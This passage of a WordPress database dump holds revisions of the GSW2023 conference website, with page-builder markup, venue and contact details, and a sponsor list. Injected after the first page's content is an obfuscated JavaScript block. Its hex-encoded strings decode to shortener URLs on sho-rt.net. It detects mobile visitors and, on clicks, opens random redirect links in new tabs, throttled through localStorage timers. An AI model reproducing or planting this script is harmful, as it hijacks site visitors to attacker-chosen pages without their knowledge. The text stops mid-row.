post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:18:45','2023-07-25 02:18:45','',3066,'https://gsw2023.com/?p=5047',0,'revision','',0),
(5048,1,'2023-07-25 02:21:22','2023-07-25 02:21:22','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251414155{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251587234{margin-top: 25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For 